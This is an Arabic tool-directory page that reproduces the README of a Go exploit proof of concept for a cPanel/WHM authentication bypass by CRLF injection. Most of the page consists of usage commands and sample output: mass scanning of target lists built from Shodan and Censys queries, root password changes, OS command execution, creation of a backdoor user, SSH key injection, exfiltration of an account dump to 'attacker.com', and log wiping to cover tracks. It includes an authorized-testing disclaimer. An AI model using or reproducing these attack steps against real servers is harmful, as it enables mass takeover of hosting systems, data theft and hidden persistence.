Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940-Exploit-PoC — استغلال PoC لثغرة CVE-2026-41940، وهي تجاوز للمصادقة في cPanel وWHM عبر حقن CRLF. يتضمن فحصًا جماعيًا، وإجراءات ما بعد الاستغلال، وقشرة تفاعلية للاختبار المصرح به. | Kitploit
أدوات/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
المصادقة والترخيصماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

استغلال PoC لثغرة CVE-2026-41940، وهي تجاوز للمصادقة في cPanel وWHM عبر حقن CRLF. يتضمن فحصًا جماعيًا، وإجراءات ما بعد الاستغلال، وقشرة تفاعلية للاختبار المصرح به.

عرض المستودعالموقع الإلكتروني
21منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-41940 استغلال PoC – تجاوز المصادقة في cPanel و WHM

CVE-2026-41940 CVSS Go Version License

الأداة من إعداد: Ishan Oshada | GitHub

⚠️ لأغراض الاختبارات الأمنية المصرح بها فقط. الاستخدام غير المصرح به غير قانوني.

1


📋 جدول المحتويات

  • نظرة عامة على الثغرة
  • سلسلة الاستغلال
  • الميزات
  • التثبيت
  • البدء السريع
  • أمثلة الاستخدام
  • إجراءات ما بعد الاستغلال
  • أوامر الصدفة التفاعلية
  • المسح الجماعي باستخدام urls.txt
  • أمثلة على المخرجات
  • مرجع الخيارات
  • الإصدارات المتأثرة
  • البناء لجميع المنصات
  • الأسئلة الشائعة واستكشاف الأخطاء
  • إخلاء المسؤولية
  • المؤلف

2

نظرة عامة على الثغرة

CVE-2026-41940 هي ثغرة حقن CRLF في cPanel و WHM (الإصدارات < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

تقوم دالة saveSession() بكتابة بيانات الجلسة بعد تطبيق filter_sessiondata()، ولكن يتم تطبيق الفلتر بعد فوات الأوان. من خلال حقن أحرف CRLF (\r\n) داخل ترويسة Authorization: Basic، يمكن للمهاجم تسميم ملف الجلسة على القرص بأزواج مفاتيح-قيم تعسفية (مثل hasroot=1, tfa_verified=1, user=root).

عند تحميل الجلسة المسمومة لاحقًا، يمنح cPanel/WHM وصولًا كاملًا كجذر دون أي كلمة مرور.

درجة CVSS: 10.0 (حرجة)

  • ناقل الهجوم: شبكة
  • تعقيد الهجوم: منخفض
  • الامتيازات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء
  • السرية: عالية
  • السلامة: عالية
  • التوفر: عالي

سلسلة الاستغلال (4 مراحل)


الميزات

  • ✅ المسح الفردي والجماعي (إدخال ملف، أنبوب stdin)
  • ✅ المسح متعدد الخيوط (التحكم في التزامن حتى 100+ خيط)
  • ✅ وضع المفصل (--verbose) – يعرض طلبات/استجابات HTTP كاملة
  • ✅ مخرجات JSON (حفظ تلقائي عند العثور على هدف ضعيف)
  • ✅ 10 إجراءات ما بعد الاستغلال (انظر الجدول أدناه)
  • ✅ متعدد المنصات (Windows, Linux, macOS)
  • ✅ بدون تبعيات خارجية (مكتبة Go القياسية فقط)
  • ✅ مخرجات طرفية ملونة مع نتائج واضحة في صناديق
  • ✅ استمرارية الجلسة – آلية الإبقاء على الاتصال
  • ✅ صدفة WHM تفاعلية مع سجل الأوامر

التثبيت

المتطلبات الأساسية

  • Go 1.20 أو أحدث (تحميل)

استنساخ المستودع

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

بناء الملف التنفيذي

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

التشغيل المباشر (بدون بناء)

root@kitploit:~
go run main.go -u https://target.com:2087

الملفات التنفيذية الجاهزة (الطريقة الأسرع)

بدلاً من البناء من المصدر، يمكنك تنزيل الملفات التنفيذية المستقرة الأحدث مباشرة من المستودع. يتم إنشاؤها تلقائيًا لكل تحديث:

ملاحظة: إذا كنت تستخدم Linux أو macOS، تذكر منح أذونات التنفيذ بعد التنزيل:


البدء السريع

root@kitploit:~
# فحص أساسي
go run main.go -u https://target.com:2087

# سرد جميع حسابات cPanel
go run main.go -u https://target.com:2087 -action list

# صدفة WHM تفاعلية
go run main.go -u https://target.com:2087 -action shell

# مسح جماعي باستخدام urls.txt
go run main.go -l urls.txt -t 20 -o results.json

أمثلة الاستخدام (جدول)


إجراءات ما بعد الاستغلال


أوامر الصدفة التفاعلية

بمجرد الدخول إلى الصدفة (-action shell)، استخدم هذه الأوامر:


المسح الجماعي باستخدام urls.txt

يتضمن المستودع urls.txt مع 1000 هدف مثال للمسح الجماعي.

تنسيق urls.txt

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

أوامر المسح الجماعي

root@kitploit:~
# مسح جماعي أساسي (10 خيوط)
go run main.go -l urls.txt

# مسح جماعي سريع (50 خيطًا، حفظ النتائج)
go run main.go -l urls.txt -t 50 -o results.json

# مسح جماعي مع إجراء ما بعد الاستغلال
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# مسح جماعي مع مخرجات مفصلة
go run main.go -l urls.txt -t 10 --verbose

# مسح جماعي مع مهلة متزايدة (شبكات بطيئة)
go run main.go -l urls.txt -t 30 -timeout 30

توليد urls.txt بنفسك

root@kitploit:~
# توليد نطاق IP (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# توليد نطاق IP (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# من Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# من Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

أمثلة على المخرجات

تم العثور على هدف ضعيف

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    تم اكتشاف هدف ضعيف                          ║
╠════════════════════════════════════════════════════════════════╣
║ الهدف: https://target.example.com:2087                        ║
║ الرمز: /cpsess1234567890                                       ║
║ الإصدار: 11.76.0.22                                            ║
║ الجلسة: :od2aMhg5zJeQunUy...                                  ║
║ رابط API: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] الإجراء: LIST
    • المستخدم: admin | النطاق: example.com
    • المستخدم: backup | النطاق: backup.example.com
    • المستخدم: client1 | النطاق: client1.com

ملخص المخرجات

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    ملخص اكتمال الفحص
════════════════════════════════════════════════════════════════════
  إجمالي الأهداف المفحوصة: 1000
  الأهداف الضعيفة: 47
  الوقت المستغرق: 125.34 ثانية

الأهداف الضعيفة:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      الرمز: /cpsess1111111111
      الإصدار: 11.76.0.22
      الجلسة: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      الرمز: /cpsess2222222222
      الإصدار: 11.86.0.15
      الجلسة: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      الرمز: /cpsess3333333333
      الإصدار: 11.118.0.42
      الجلسة: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] تم حفظ النتائج في: results.json

مرجع الخيارات


الإصدارات المتأثرة


البناء لجميع المنصات

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

الترجمة المتقاطعة لجميع المنصات

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

هيكل الدليل

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # التوثيق
├── bin/                # ملفات تنفيذية جاهزة متعددة المنصات 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # الكود المصدري الرئيسي
├── urls.txt            # 1000 هدف مثال
├── go.mod              # ملف وحدة Go
├── .gitignore          # ملف تجاهل Git
└── results.json        # ملف الإخراج (مُنشأ)

إخلاء المسؤولية

هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط.

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب:

  • قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) - الولايات المتحدة
  • قانون إساءة استخدام الكمبيوتر - المملكة المتحدة
  • قانون تكنولوجيا المعلومات - الهند
  • قوانين مماثلة في جميع أنحاء العالم

المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام. استخدم على مسؤوليتك الخاصة.

باستخدام هذه الأداة، فإنك توافق على أن لديك التفويض المناسب لاختبار الأنظمة المستهدفة.


المؤلف

Ishan Oshada

  • 🔗 الموقع: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 البريد الإلكتروني: [email protected]

Views

الدعم

إذا وجدت هذه الأداة مفيدة:

  • ⭐ قم بتمييز المستودع بنجمة على GitHub
  • 🔄 شاركها مع مجتمع الأمن
  • 📝 أبلغ عن المشكلات عبر GitHub Issues

استمتع بالاختراق! 🚀

تذكر: مع القوة العظيمة تأتي مسؤولية عظيمة. استخدمها بأخلاق.

تنزيل الأداة
المرحلةالإجراءالوصف
1POST /login/?login_only=1طلب ملف تعريف ارتباط جلسة ما قبل المصادقة ببيانات اعتماد خاطئة
2GET / + ترويسة Authorization مع CRLFتسميم ملف الجلسة بـ hasroot=1, user=root, إلخ.
3GET /scripts2/listacctsإجبار ذاكرة التخزين المؤقت للجلسة على إعادة تحميل الملف المسموم (الانتشار)
4GET /cpsess<TOKEN>/json-api/versionالتحقق من وصول الجذر – النجاح = 200 + بيانات الإصدار
المنصةالموقع
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#الغرضالأمر
1فحص هدف واحد أساسيgo run main.go -u https://target.com:2087
2سرد جميع حسابات cPanelgo run main.go -u https://target.com:2087 -action list
3تغيير كلمة مرور الجذرgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4تنفيذ أمر نظامgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5الحصول على معلومات الخادمgo run main.go -u https://target.com:2087 -action info
6إنشاء مستخدم باب خلفيgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7إنشاء رمز API (سري)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8حقن مفتاح SSHgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9تفريغ ونقل الحسابgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10مسح السجلات وتغطية الآثارgo run main.go -u https://target.com:2087 -action wipe
11صدفة WHM تفاعليةgo run main.go -u https://target.com:2087 -action shell
12مسح جماعي من ملفgo run main.go -l urls.txt -t 20 -o results.json
13حفظ النتائج في JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14تفعيل تصحيح الأخطاء المفصلgo run main.go -u https://target.com:2087 --verbose
15الأنبوب من أدوات أخرىcat urls.txt | go run main.go -t 20
16زيادة المهلةgo run main.go -u https://target.com:2087 -timeout 30
الإجراءالعلامةالوصفمستوى التخفي
list-action listسرد جميع حسابات cPanelمنخفض
passwd-action passwd -passwd NEWPASSتغيير كلمة مرور الجذر (صاخب)عالي (قابل للاكتشاف)
cmd-action cmd -cmd "id"تنفيذ أوامر نظام التشغيلمتوسط
info-action infoعرض اسم المضيف، الحمل، الإصدارمنخفض
adduser-action adduser -new-user U -new-domain Dإنشاء مستخدم cPanel باب خلفيمتوسط
apitoken-action apitoken [-tokenname NAME]توليد رمز API دائممنخفض جدًا
sshkey-action sshkey -sshkey "ssh-rsa..."حقن مفتاح SSH العام في الجذرمنخفض جدًا
dumpacct-action dumpacct -dumpuser USER -exfil URLنسخ احتياطي ونقل الحسابمتوسط
wipe-action wipeتعطيل WAF، مسح السجلات، مسح التاريختغطية الآثار
shell-action shellصدفة WHM تفاعليةمنخفض
الأمرالوصفمثال
accountsسرد جميع حسابات cPanelaccounts
passwd <pass>تغيير كلمة مرور الجذرpasswd MyNewPass123!2006
exec <command>تنفيذ أمر نظامexec "cat /etc/passwd"
infoعرض معلومات الخادمinfo
versionعرض إصدار cPanelversion
helpعرض الأوامر المتاحةhelp
exitالخروج من الصدفةexit
الخيارالنوعالافتراضيالوصف
-ustring-رابط الهدف (مثل https://example.com:2087)
-lstring-ملف يحتوي على الأهداف (واحد في كل سطر)
-tint10عدد الخيوط المتزامنة
-actionstring-إجراء ما بعد الاستغلال
-passwdstring-كلمة المرور الجديدة (لإجراء passwd/adduser)
-cmdstring-الأمر المراد تنفيذه (لإجراء cmd)
-new-userstring-اسم المستخدم لإجراء adduser
-new-domainstring-النطاق لإجراء adduser
-tokennamestring-اسم رمز API (إجراء apitoken)
-sshkeystring-مفتاح SSH العام للحقن (إجراء sshkey)
-dumpuserstring-اسم المستخدم للنسخ الاحتياطي (إجراء dumpacct)
-exfilstring-رابط بعيد للنقل (إجراء dumpacct)
-ostring-ملف JSON للإخراج (حفظ تلقائي عند العثور)
--verboseboolfalseعرض طلبات/استجابات HTTP
-hboolfalseعرض قائمة المساعدة
الفرعالإصدار المُصححالضعيف <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4